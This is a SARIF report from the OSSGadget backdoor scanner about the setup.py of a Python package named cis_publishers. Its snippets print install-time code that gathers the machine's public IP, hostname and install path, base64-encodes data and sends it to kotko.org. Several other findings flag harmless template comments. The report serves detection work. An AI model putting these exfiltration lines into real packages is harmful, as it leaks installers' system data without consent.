{
  "$schema": "https://schemastore.azurewebsites.net/schemas/json/sarif-2.1.0-rtm.6.json",
  "version": "2.1.0",
  "runs": [
    {
      "tool": {
        "driver": {
          "name": "oss-detect-backdoor",
          "organization": "Microsoft Corporation",
          "product": "OSSGadget (https://github.com/Microsoft/OSSGadget)",
          "version": "0.0.0+4a24249b20"
        }
      },
      "results": [
        {
          "rule": {
            "id": "BD000102"
          },
          "message": {
            "text": "Backdoor: Web Request in Setup",
            "id": "BD000102"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset2/python/cis_publishers-1.2.3-r0.apk/cis_publishers-1.2.3-r0/home/cg/cis_publishers/setup.py"
                },
                "region": {
                  "startLine": 62,
                  "startColumn": 9,
                  "endLine": 62,
                  "endColumn": 21,
                  "snippet": {
                    "text": "    base64_bytes = base64.b64encode(message_bytes)\n    base64_message = base64_bytes.decode('ascii')\n\n    r  = requests.get(\"https://kotko.org?\"+company+name+\"=\"+base64_message)\n\n\n\n",
                    "rendered": {
                      "text": "    base64_bytes = base64.b64encode(message_bytes)\n    base64_message = base64_bytes.decode('ascii')\n\n    r  = requests.get(\"https://kotko.org?\"+company+name+\"=\"+base64_message)\n\n\n\n",
                      "markdown": "`    base64_bytes = base64.b64encode(message_bytes)\n    base64_message = base64_bytes.decode('ascii')\n\n    r  = requests.get(\"https://kotko.org?\"+company+name+\"=\"+base64_message)\n\n\n\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 2
          }
        },
        {
          "rule": {
            "id": "BD000102"
          },
          "message": {
            "text": "Backdoor: Web Request in Setup",
            "id": "BD000102"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset2/python/cis_publishers-1.2.3-r0.apk/cis_publishers-1.2.3-r0/home/cg/cis_publishers/setup.py"
                },
                "region": {
                  "startLine": 47,
                  "startColumn": 9,
                  "endLine": 47,
                  "endColumn": 21,
                  "snippet": {
                    "text": "    f.write('proof bug by kotko')\n    f.close()\n\n    ip = requests.get('https://api.ipify.org').text\n    ipText = format(ip);\n    myhost = os.uname()[1]\n    currentPath = requests.utils.quote(bytes(pathlib.Path(__file__).parent.absolute()));\n",
                    "rendered": {
                      "text": "    f.write('proof bug by kotko')\n    f.close()\n\n    ip = requests.get('https://api.ipify.org').text\n    ipText = format(ip);\n    myhost = os.uname()[1]\n    currentPath = requests.utils.quote(bytes(pathlib.Path(__file__).parent.absolute()));\n",
                      "markdown": "`    f.write('proof bug by kotko')\n    f.close()\n\n    ip = requests.get('https://api.ipify.org').text\n    ipText = format(ip);\n    myhost = os.uname()[1]\n    currentPath = requests.utils.quote(bytes(pathlib.Path(__file__).parent.absolute()));\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 2
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset2/python/cis_publishers-1.2.3-r0.apk/cis_publishers-1.2.3-r0/home/cg/cis_publishers/setup.py"
                },
                "region": {
                  "startLine": 199,
                  "startColumn": 9,
                  "endLine": 199,
                  "endColumn": 14,
                  "snippet": {
                    "text": "    # dependencies). Users will be able to install these using the \"extras\"\n    # syntax, for example:\n    #\n    #   $ pip install sampleproject[dev]\n    #\n    # Similar to `install_requires` above, these must be valid existing\n    # projects.\n",
                    "rendered": {
                      "text": "    # dependencies). Users will be able to install these using the \"extras\"\n    # syntax, for example:\n    #\n    #   $ pip install sampleproject[dev]\n    #\n    # Similar to `install_requires` above, these must be valid existing\n    # projects.\n",
                      "markdown": "`    # dependencies). Users will be able to install these using the \"extras\"\n    # syntax, for example:\n    #\n    #   $ pip install sampleproject[dev]\n    #\n    # Similar to `install_requires` above, these must be valid existing\n    # projects.\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset2/python/cis_publishers-1.2.3-r0.apk/cis_publishers-1.2.3-r0/home/cg/cis_publishers/setup.py"
                },
                "region": {
                  "startLine": 188,
                  "startColumn": 51,
                  "endLine": 188,
                  "endColumn": 56,
                  "snippet": {
                    "text": "    python_requires='>=3.6, <4',\n\n    # This field lists other packages that your project depends on to run.\n    # Any package you put here will be installed by pip when your project is\n    # installed, so they must be valid existing projects.\n    #\n    # For an analysis of \"install_requires\" vs pip's requirements files see:\n",
                    "rendered": {
                      "text": "    python_requires='>=3.6, <4',\n\n    # This field lists other packages that your project depends on to run.\n    # Any package you put here will be installed by pip when your project is\n    # installed, so they must be valid existing projects.\n    #\n    # For an analysis of \"install_requires\" vs pip's requirements files see:\n",
                      "markdown": "`    python_requires='>=3.6, <4',\n\n    # This field lists other packages that your project depends on to run.\n    # Any package you put here will be installed by pip when your project is\n    # installed, so they must be valid existing projects.\n    #\n    # For an analysis of \"install_requires\" vs pip's requirements files see:\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset2/python/cis_publishers-1.2.3-r0.apk/cis_publishers-1.2.3-r0/home/cg/cis_publishers/setup.py"
                },
                "region": {
                  "startLine": 174,
                  "startColumn": 62,
                  "endLine": 174,
                  "endColumn": 70,
                  "snippet": {
                    "text": "    # simple. Or you can use find_packages().\n    #\n    # Alternatively, if you just want to distribute a single Python file, use\n    # the `py_modules` argument instead as follows, which will expect a file\n    # called `my_module.py` to exist:\n    #\n    #   py_modules=[\"my_module\"],\n",
                    "rendered": {
                      "text": "    # simple. Or you can use find_packages().\n    #\n    # Alternatively, if you just want to distribute a single Python file, use\n    # the `py_modules` argument instead as follows, which will expect a file\n    # called `my_module.py` to exist:\n    #\n    #   py_modules=[\"my_module\"],\n",
                      "markdown": "`    # simple. Or you can use find_packages().\n    #\n    # Alternatively, if you just want to distribute a single Python file, use\n    # the `py_modules` argument instead as follows, which will expect a file\n    # called `my_module.py` to exist:\n    #\n    #   py_modules=[\"my_module\"],\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset2/python/cis_publishers-1.2.3-r0.apk/cis_publishers-1.2.3-r0/home/cg/cis_publishers/setup.py"
                },
                "region": {
                  "startLine": 144,
                  "startColumn": 34,
                  "endLine": 145,
                  "snippet": {
                    "text": "        'Intended Audience :: Developers',\n        'Topic :: Software Development :: Build Tools',\n\n        # Pick your license as you wish\n        'License :: OSI Approved :: MIT License',\n\n        # Specify the Python versions you support here. In particular, ensure\n        # that you indicate you support Python 3. These classifiers are *not*\n",
                    "rendered": {
                      "text": "        'Intended Audience :: Developers',\n        'Topic :: Software Development :: Build Tools',\n\n        # Pick your license as you wish\n        'License :: OSI Approved :: MIT License',\n\n        # Specify the Python versions you support here. In particular, ensure\n        # that you indicate you support Python 3. These classifiers are *not*\n",
                      "markdown": "`        'Intended Audience :: Developers',\n        'Topic :: Software Development :: Build Tools',\n\n        # Pick your license as you wish\n        'License :: OSI Approved :: MIT License',\n\n        # Specify the Python versions you support here. In particular, ensure\n        # that you indicate you support Python 3. These classifiers are *not*\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset2/python/cis_publishers-1.2.3-r0.apk/cis_publishers-1.2.3-r0/home/cg/cis_publishers/setup.py"
                },
                "region": {
                  "startLine": 130,
                  "startColumn": 28,
                  "endLine": 130,
                  "endColumn": 34,
                  "snippet": {
                    "text": "    author_email='mailbox@kotko.me',  # Optional\n    include_package_data=True,\n\n    # Classifiers help users find your project by categorizing it.\n    #\n    # For a list of valid classifiers, see https://pypi.org/classifiers/\n    classifiers=[  # Optional\n",
                    "rendered": {
                      "text": "    author_email='mailbox@kotko.me',  # Optional\n    include_package_data=True,\n\n    # Classifiers help users find your project by categorizing it.\n    #\n    # For a list of valid classifiers, see https://pypi.org/classifiers/\n    classifiers=[  # Optional\n",
                      "markdown": "`    author_email='mailbox@kotko.me',  # Optional\n    include_package_data=True,\n\n    # Classifiers help users find your project by categorizing it.\n    #\n    # For a list of valid classifiers, see https://pypi.org/classifiers/\n    classifiers=[  # Optional\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset2/python/cis_publishers-1.2.3-r0.apk/cis_publishers-1.2.3-r0/home/cg/cis_publishers/setup.py"
                },
                "region": {
                  "startLine": 71,
                  "startColumn": 7,
                  "endLine": 71,
                  "endColumn": 12,
                  "snippet": {
                    "text": "    # package, this name will be registered for you. It will determine how\n    # users can install this project, e.g.:\n    #\n    # $ pip install sampleproject\n    #\n    # And where it will live on PyPI: https://pypi.org/project/sampleproject/\n    #\n",
                    "rendered": {
                      "text": "    # package, this name will be registered for you. It will determine how\n    # users can install this project, e.g.:\n    #\n    # $ pip install sampleproject\n    #\n    # And where it will live on PyPI: https://pypi.org/project/sampleproject/\n    #\n",
                      "markdown": "`    # package, this name will be registered for you. It will determine how\n    # users can install this project, e.g.:\n    #\n    # $ pip install sampleproject\n    #\n    # And where it will live on PyPI: https://pypi.org/project/sampleproject/\n    #\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset2/python/cis_publishers-1.2.3-r0.apk/cis_publishers-1.2.3-r0/home/cg/cis_publishers/setup.py"
                },
                "region": {
                  "startLine": 67,
                  "startColumn": 49,
                  "endLine": 67,
                  "endColumn": 55,
                  "snippet": {
                    "text": "\n\nsetup(\n    # This is the name of your project. The first time you publish this\n    # package, this name will be registered for you. It will determine how\n    # users can install this project, e.g.:\n    #\n",
                    "rendered": {
                      "text": "\n\nsetup(\n    # This is the name of your project. The first time you publish this\n    # package, this name will be registered for you. It will determine how\n    # users can install this project, e.g.:\n    #\n",
                      "markdown": "`\n\nsetup(\n    # This is the name of your project. The first time you publish this\n    # package, this name will be registered for you. It will determine how\n    # users can install this project, e.g.:\n    #\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset2/python/cis_publishers-1.2.3-r0.apk/cis_publishers-1.2.3-r0/home/cg/cis_publishers/setup.py"
                },
                "region": {
                  "startLine": 47,
                  "startColumn": 3,
                  "endLine": 47,
                  "endColumn": 7,
                  "snippet": {
                    "text": "    f.write('proof bug by kotko')\n    f.close()\n\n    ip = requests.get('https://api.ipify.org').text\n    ipText = format(ip);\n    myhost = os.uname()[1]\n    currentPath = requests.utils.quote(bytes(pathlib.Path(__file__).parent.absolute()));\n",
                    "rendered": {
                      "text": "    f.write('proof bug by kotko')\n    f.close()\n\n    ip = requests.get('https://api.ipify.org').text\n    ipText = format(ip);\n    myhost = os.uname()[1]\n    currentPath = requests.utils.quote(bytes(pathlib.Path(__file__).parent.absolute()));\n",
                      "markdown": "`    f.write('proof bug by kotko')\n    f.close()\n\n    ip = requests.get('https://api.ipify.org').text\n    ipText = format(ip);\n    myhost = os.uname()[1]\n    currentPath = requests.utils.quote(bytes(pathlib.Path(__file__).parent.absolute()));\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000610"
          },
          "message": {
            "text": "Backdoor: LOLBAS: Linux Indicator",
            "id": "BD000610"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset2/python/cis_publishers-1.2.3-r0.apk/cis_publishers-1.2.3-r0/home/cg/cis_publishers/setup.py"
                },
                "region": {
                  "startLine": 7,
                  "startColumn": 6,
                  "endLine": 8,
                  "snippet": {
                    "text": "import requests\nimport os\nimport pathlib\nimport base64\nfrom multiprocessing.pool import ThreadPool as Pool\nfrom distutils.command.install import install\n\n\n",
                    "rendered": {
                      "text": "import requests\nimport os\nimport pathlib\nimport base64\nfrom multiprocessing.pool import ThreadPool as Pool\nfrom distutils.command.install import install\n\n\n",
                      "markdown": "`import requests\nimport os\nimport pathlib\nimport base64\nfrom multiprocessing.pool import ThreadPool as Pool\nfrom distutils.command.install import install\n\n\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 4,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000800"
          },
          "message": {
            "text": "Backdoor: Obfuscation",
            "id": "BD000800"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset2/python/cis_publishers-1.2.3-r0.apk/cis_publishers-1.2.3-r0/home/cg/cis_publishers/setup.py"
                },
                "region": {
                  "startLine": 59,
                  "startColumn": 19,
                  "endLine": 59,
                  "endColumn": 25,
                  "snippet": {
                    "text": "\n    message = PYdataS\n    message_bytes = message.encode('ascii')\n    base64_bytes = base64.b64encode(message_bytes)\n    base64_message = base64_bytes.decode('ascii')\n\n    r  = requests.get(\"https://kotko.org?\"+company+name+\"=\"+base64_message)\n",
                    "rendered": {
                      "text": "\n    message = PYdataS\n    message_bytes = message.encode('ascii')\n    base64_bytes = base64.b64encode(message_bytes)\n    base64_message = base64_bytes.decode('ascii')\n\n    r  = requests.get(\"https://kotko.org?\"+company+name+\"=\"+base64_message)\n",
                      "markdown": "`\n    message = PYdataS\n    message_bytes = message.encode('ascii')\n    base64_bytes = base64.b64encode(message_bytes)\n    base64_message = base64_bytes.decode('ascii')\n\n    r  = requests.get(\"https://kotko.org?\"+company+name+\"=\"+base64_message)\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000800"
          },
          "message": {
            "text": "Backdoor: Obfuscation",
            "id": "BD000800"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset2/python/cis_publishers-1.2.3-r0.apk/cis_publishers-1.2.3-r0/home/cg/cis_publishers/setup.py"
                },
                "region": {
                  "startLine": 7,
                  "startColumn": 7,
                  "endLine": 7,
                  "endColumn": 13,
                  "snippet": {
                    "text": "import requests\nimport os\nimport pathlib\nimport base64\nfrom multiprocessing.pool import ThreadPool as Pool\nfrom distutils.command.install import install\n\n",
                    "rendered": {
                      "text": "import requests\nimport os\nimport pathlib\nimport base64\nfrom multiprocessing.pool import ThreadPool as Pool\nfrom distutils.command.install import install\n\n",
                      "markdown": "`import requests\nimport os\nimport pathlib\nimport base64\nfrom multiprocessing.pool import ThreadPool as Pool\nfrom distutils.command.install import install\n\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 4
          }
        },
        {
          "rule": {
            "id": "BD000700"
          },
          "message": {
            "text": "Backdoor: Data Exfiltration",
            "id": "BD000700"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset2/python/cis_publishers-1.2.3-r0.apk/cis_publishers-1.2.3-r0/home/cg/cis_publishers/setup.py"
                },
                "region": {
                  "startLine": 62,
                  "startColumn": 17,
                  "endLine": 62,
                  "endColumn": 22,
                  "snippet": {
                    "text": "    base64_bytes = base64.b64encode(message_bytes)\n    base64_message = base64_bytes.decode('ascii')\n\n    r  = requests.get(\"https://kotko.org?\"+company+name+\"=\"+base64_message)\n\n\n\n",
                    "rendered": {
                      "text": "    base64_bytes = base64.b64encode(message_bytes)\n    base64_message = base64_bytes.decode('ascii')\n\n    r  = requests.get(\"https://kotko.org?\"+company+name+\"=\"+base64_message)\n\n\n\n",
                      "markdown": "`    base64_bytes = base64.b64encode(message_bytes)\n    base64_message = base64_bytes.decode('ascii')\n\n    r  = requests.get(\"https://kotko.org?\"+company+name+\"=\"+base64_message)\n\n\n\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 1
          }
        },
        {
          "rule": {
            "id": "BD000700"
          },
          "message": {
            "text": "Backdoor: Data Exfiltration",
            "id": "BD000700"
          },
          "locations": [
            {
              "physicalLocation": {
                "address": {
                  "relativeAddress": -1,
                  "fullyQualifiedName": "/tmp/datasets/dataset2/python/cis_publishers-1.2.3-r0.apk/cis_publishers-1.2.3-r0/home/cg/cis_publishers/setup.py"
                },
                "region": {
                  "startLine": 47,
                  "startColumn": 17,
                  "endLine": 47,
                  "endColumn": 22,
                  "snippet": {
                    "text": "    f.write('proof bug by kotko')\n    f.close()\n\n    ip = requests.get('https://api.ipify.org').text\n    ipText = format(ip);\n    myhost = os.uname()[1]\n    currentPath = requests.utils.quote(bytes(pathlib.Path(__file__).parent.absolute()));\n",
                    "rendered": {
                      "text": "    f.write('proof bug by kotko')\n    f.close()\n\n    ip = requests.get('https://api.ipify.org').text\n    ipText = format(ip);\n    myhost = os.uname()[1]\n    currentPath = requests.utils.quote(bytes(pathlib.Path(__file__).parent.absolute()));\n",
                      "markdown": "`    f.write('proof bug by kotko')\n    f.close()\n\n    ip = requests.get('https://api.ipify.org').text\n    ipText = format(ip);\n    myhost = os.uname()[1]\n    currentPath = requests.utils.quote(bytes(pathlib.Path(__file__).parent.absolute()));\n`"
                    }
                  },
                  "sourceLanguage": "python"
                }
              }
            }
          ],
          "properties": {
            "Severity": 2,
            "Confidence": 1
          }
        }
      ],
      "columnKind": "utf16CodeUnits"
    }
  ]
}